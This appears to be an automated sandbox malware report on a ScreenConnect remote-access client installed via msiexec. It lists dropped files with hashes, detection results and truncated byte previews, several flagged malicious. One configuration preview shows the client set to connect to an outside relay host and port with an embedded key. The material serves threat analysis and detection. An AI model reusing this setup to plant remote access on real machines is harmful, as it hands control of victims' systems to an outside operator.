                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.................. ... ....... .......................`......#.....@.................................A...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................u.......H...........4............_...... .........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):68096
                                                                                                            Entropy (8bit):6.06942231395039
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:+A0ZscQ5V6TsQqoSD6h6+39QFVIl1zJhb8gq:p0Zy3gUOQFVQzJq
                                                                                                            MD5:5DB908C12D6E768081BCED0E165E36F8
                                                                                                            SHA1:F2D3160F15CFD0989091249A61132A369E44DEA4
                                                                                                            SHA-256:FD5818DCDF5FC76316B8F7F96630EC66BB1CB5B5A8127CF300E5842F2C74FFCA
                                                                                                            SHA-512:8400486CADB7C07C08338D8876BC14083B6F7DE8A8237F4FE866F4659139ACC0B587EB89289D281106E5BAF70187B3B5E86502A2E340113258F03994D959328D
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: f53WqfzzNt.exe, Detection: malicious, Browse
                                                                                                            • Filename: 6IqUjK9Koj.exe, Detection: malicious, Browse
                                                                                                            • Filename: hB52OUUCE2.exe, Detection: malicious, Browse
                                                                                                            • Filename: lCwus2wfk6.exe, Detection: malicious, Browse
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                            • Filename: VVs9SAqm5N.exe, Detection: malicious, Browse
                                                                                                            • Filename: 1g6DULljd2.exe, Detection: malicious, Browse
                                                                                                            • Filename: 2nmtr41l0S.exe, Detection: malicious, Browse
                                                                                                            • Filename: pbenHWj8JO.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...nu............" ..0.............. ... ...@....... ..............................p.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):95512
                                                                                                            Entropy (8bit):6.504684691533346
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:Eg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkggU0HMx790K:dhbNDxZGXfdHrX7rAc6myJkggU0HqB
                                                                                                            MD5:75B21D04C69128A7230A0998086B61AA
                                                                                                            SHA1:244BD68A722CFE41D1F515F5E40C3742BE2B3D1D
                                                                                                            SHA-256:F1B5C000794F046259121C63ED37F9EFF0CFE1258588ECA6FD85E16D3922767E
                                                                                                            SHA-512:8D51B2CD5F21C211EB8FEA4B69DC9F91DFFA7BB004D9780C701DE35EAC616E02CA30EF3882D73412F7EAB1211C5AA908338F3FA10FDF05B110F62B8ECD9D24C2
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................>)....@.................................p...x....`..P............L...)...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):548864
                                                                                                            Entropy (8bit):6.034211651049746
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:xC2YKhQCNc6kVTplfWL/YTHUYCBdySISYz:HhE6O7WL/EC
                                                                                                            MD5:14E7489FFEBBB5A2EA500F796D881AD9
                                                                                                            SHA1:0323EE0E1FAA4AA0E33FB6C6147290AA71637EBD
                                                                                                            SHA-256:A2E9752DE49D18E885CBD61B29905983D44B4BC0379A244BFABDAA3188C01F0A
                                                                                                            SHA-512:2110113240B7D803D8271139E0A2439DBC86AE8719ECD8B132BBDA2520F22DC3F169598C8E966AC9C0A40E617219CB8FE8AAC674904F6A1AE92D4AC1E20627CD
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............." ..0..X...........s... ........... ..............................].....@.................................as..O.......t............................r..8............................................ ............... ..H............text....W... ...X.................. ..`.rsrc...t............Z..............@..@.reloc...............^..............@..B.................s......H........C..,/..................Dr........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1721856
                                                                                                            Entropy (8bit):6.639085961200334
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dx5xeYkYFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:dx5xTkYJkGYYpT0+TFiH7efP
                                                                                                            MD5:9AD3964BA3AD24C42C567E47F88C82B2
                                                                                                            SHA1:6B4B581FC4E3ECB91B24EC601DAA0594106BCC5D
                                                                                                            SHA-256:84A09ED81AFC5FF9A17F81763C044C82A2D9E26F852DE528112153EE9AB041D0
                                                                                                            SHA-512:CE557A89C0FE6DE59046116C1E262A36BBC3D561A91E44DCDA022BEF72CB75742C8B01BEDCC5B9B999E07D8DE1F94C665DD85D277E981B27B6BFEBEAF9E58097
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...y............." ..0..>..........~]... ...`....... ..............................8.....@.................................+]..O....`..|............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................_]......H.......t...d..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):260168
                                                                                                            Entropy (8bit):6.416438906122177
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                                                                            MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                                                                            SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                                                                            SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                                                                            SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61208
                                                                                                            Entropy (8bit):6.310126082367387
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:kW/+lo6MOc8IoiKWjrNv8DtyQ4RE+TC6WAhVbb57bP8:kLlo6dccldyQGWy5s
                                                                                                            MD5:AFA97CAF20F3608799E670E9D6253247
                                                                                                            SHA1:7E410FDE0CA1350AA68EF478E48274888688F8EE
                                                                                                            SHA-256:E25F32BA3FA32FD0DDD99EB65B26835E30829B5E4B58573690AA717E093A5D8F
                                                                                                            SHA-512:FE0B378651783EF4ADD3851E12291C82EDCCDE1DBD1FA0B76D7A2C2DCD181E013B9361BBDAE4DAE946C0D45FB4BF6F75DC027F217326893C906E47041E3039B0
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....c+..........."...0.................. ........@.. ....................... .......r....@.....................................O....... ................)..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):602392
                                                                                                            Entropy (8bit):6.176232491934078
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6144:fybAk1FVMVTZL/4TvqpU0pSdRW3akod1sI5mgve8mZXuRFtSc4q2/R4IEyxuV5AN:qbAOwJ/MvIFptJoR5NmtiFsxsFE
                                                                                                            MD5:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                            SHA1:0203B65E92D2D1200DD695FE4C334955BEFBDDD3
                                                                                                            SHA-256:600CF10E27311E60D32722654EF184C031A77B5AE1F8ABAE8891732710AFEE31
                                                                                                            SHA-512:A902080FF8EE0D9AEFFA0B86E7980457A4E3705789529C82679766580DF0DC17535D858FBE50731E00549932F6D49011868DEE4181C6716C36379AD194B0ED69
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`............@.................................M...O.... ...................)...@..........8............................................ ............... ..H............text...p.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......XJ......................$.........................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe.config

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:true
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dll

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):842248
                                                                                                            Entropy (8bit):6.268561504485627
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
                                                                                                            MD5:BE74AB7A848A2450A06DE33D3026F59E
                                                                                                            SHA1:21568DCB44DF019F9FAF049D6676A829323C601E
                                                                                                            SHA-256:7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
                                                                                                            SHA-512:2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...|..............@..B................................................................................................................................................................................................................................................................

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):81688
                                                                                                            Entropy (8bit):5.8618809599146005
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:Ety9l44Kzb1I5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7j27Vy:PvqukLdn2s
                                                                                                            MD5:1AEE526DC110E24D1399AFFCCD452AB3
                                                                                                            SHA1:04DB0E8772933BC57364615D0D104DC2550BD064
                                                                                                            SHA-256:EBD04A4540D6E76776BD58DEEA627345D0F8FBA2C04CC65BE5E979A8A67A62A1
                                                                                                            SHA-512:482A8EE35D53BE907BE39DBD6C46D1F45656046BACA95630D1F07AC90A66F0E61D41F940FB166677AC4D5A48CF66C28E76D89912AED3D673A80737732E863851
                                                                                                            Malicious:false
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....o..........."...0..@...........^... ...`....@.. .......................`.......$....@..................................^..O....`...................)...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....*^.(.......;...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(*........(+...o,...(-...t....

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exe.config

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):266
                                                                                                            Entropy (8bit):4.842791478883622
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                            MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                            SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                            SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                            SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                            C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\system.config

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\msiexec.exe
                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (463), with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):953
                                                                                                            Entropy (8bit):5.76285111936072
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24:2dL9hK6E4dl/kGuanOt+qPySnLb5pUgzWvH:chh7HHiqo1nLHHWv
                                                                                                            MD5:D4A9F5EA2DA4BBD0CB33743E9BC848CE
                                                                                                            SHA1:BBEA3254495249FA96D667391BA4E90F92CBACD5
                                                                                                            SHA-256:644282531083B8CDE902CDBDB71BDC55C3AAE9225072465B66640C16A5923F27
                                                                                                            SHA-512:00186C860DAF6690F5A5D0E2B90DC76A049759562C52407BC51662F775FDE6DFFEFD036ACC4C8ADC9955E0D8F39897E6E11BDDBCF0003FE279B6D9DE31C63EC6
                                                                                                            Malicious:false
                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=sc.connectprotocol.es&amp;p=8041&amp;k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.chk

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):8192
                                                                                                            Entropy (8bit):0.35901589905449205
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
                                                                                                            MD5:C788EDB928436D0CE10A5BF198837D8A
                                                                                                            SHA1:F104B6AB797E0B16362BFB69F5000407CE6EFFD8
                                                                                                            SHA-256:E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
                                                                                                            SHA-512:61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
                                                                                                            Malicious:false
                                                                                                            Preview:*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.7304551290048233
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0g:9JZj5MiKNnNhoxu1
                                                                                                            MD5:20D68F143D5EC60E389EE035B3B76030
                                                                                                            SHA1:7B6F68177765B859E0F176D0257B5615B7591588
                                                                                                            SHA-256:A003F0EB0E78D880C8A735EBD286A5E5B11489CE7CE1A8C8D27B05C079EC32F0
                                                                                                            SHA-512:A67C9B6F16293FC776C4AD5C224E61DB5EF6F4DDB558BB3538C5A49AAB36B75B027A0E99BBDEC78DAFC2C3CF9D5FCEE1799679AF543C736FD58B8E51FDAEB2B0
                                                                                                            Malicious:false
                                                                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0xcc4131d6, page size 16384, Windows version 10.0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1310720
                                                                                                            Entropy (8bit):0.6291579939223056
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:PSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Paza9iJa+2UtmOQOL
                                                                                                            MD5:EAC247C67AA79428818BF83481CE5DF1
                                                                                                            SHA1:34B6EF692727D9211CCE92174F6CEB853AB2AE76
                                                                                                            SHA-256:14DBFBDFED2596B3772F1D11879B75D15D3A42A3E5225C33DD288256D21F7608
                                                                                                            SHA-512:B6615A27DB651020A02BDF86B67916418DFDF4CDB15E5287F11707D6C37A33C7F505A45D1910BE808687E867772D5AA4F8282A0E4634E6A9BD8CD3208CAB8024
                                                                                                            Malicious:false
                                                                                                            Preview:.A1.... .......P.......X\...;...{......................0.j..... ....|.......|9.h.g..... ....|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{..................................'.6. ....|...................q.. ....|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):16384
                                                                                                            Entropy (8bit):0.0796328158147682
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:9t/OetYeAsZ8FeeykDRZUF/JdkFillHol///lZMPCyH:f/rzReTz4J9po5
                                                                                                            MD5:ECF80663C4CBC2784F0FA6C571C63691
                                                                                                            SHA1:DEB4153DAF27EBD0C7AD9E1EE619C351F5439941
                                                                                                            SHA-256:C19E727D61A83D9086413956C3DF2BA822ABD9BB82B75CEF5CBF417E348787D5
                                                                                                            SHA-512:159B4AC0D6953348D40A75036CB436C1C3108B84B8725A39FDB31C9DF7CB483300C7DF8C95A0FE9D4B0961E3EB07D07226998D89C5C2A4C4A8361178DFB5A208
                                                                                                            Malicious:false
